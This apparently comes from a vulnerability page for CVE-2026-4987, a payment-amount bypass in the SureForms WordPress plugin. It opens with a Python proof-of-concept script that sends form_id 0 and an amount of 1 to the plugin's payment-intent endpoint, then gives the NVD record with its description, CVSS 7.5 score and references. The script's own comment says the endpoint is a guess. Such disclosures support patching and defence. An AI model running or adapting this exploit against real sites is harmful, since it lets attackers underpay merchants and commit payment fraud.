CVE-2026-4987

import requests def exploit_payment_bypass(target_url): """ PoC for CVE-2026-4987 Demonstrates bypassing payment validation by setting form_id to 0. """ # The vulnerable endpoint might vary, this is a generic example based on the description endpoint = f"{target_url}/wp-json/sureforms/v1/payment_intent" headers = { "Content-Type": "application/json" } # Malicious payload setting form_id to 0 payload = { "form_id": 0, "amount": 1, # Attempting to pay minimal amount "currency": "USD" } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Potential bypass successful!") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with target exploit_payment_bypass(target)

{"cve": {"id": "CVE-2026-4987", "sourceIdentifier": "[email protected]", "published": "2026-03-28T02:16:14.793", "lastModified": "2026-04-24T16:36:24.067", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SureForms – Contact Form, Payment Form & Other Custom Form Builder plugin for WordPress is vulnerable to Payment Amount Bypass in all versions up to, and including, 2.5.2. This is due to the create_payment_intent() function performing a payment validation solely based on the value of a user-controlled parameter. This makes it possible for unauthenticated attackers to bypass configured form payment-amount validation and create underpriced payment/subscription intents by setting form_id to 0."}, {"lang": "es", "value": "El plugin SureForms – Contact Form, Payment Form & Other Custom Form Builder para WordPress es vulnerable a la Omisión de Cantidad de Pago en todas las versiones hasta la 2.5.2, inclusive. Esto se debe a que la función create_payment_intent() realiza una validación de pago únicamente basada en el valor de un parámetro controlado por el usuario. Esto hace posible que atacantes no autenticados omitan la validación de cantidad de pago del formulario configurada y creen intenciones de pago/suscripción con precios reducidos al establecer form_id en 0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3488858/sureforms", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4772b32-a730-44f2-b43c-f9bd5abb6541?source=cve", "source": "[email protected]"}]}}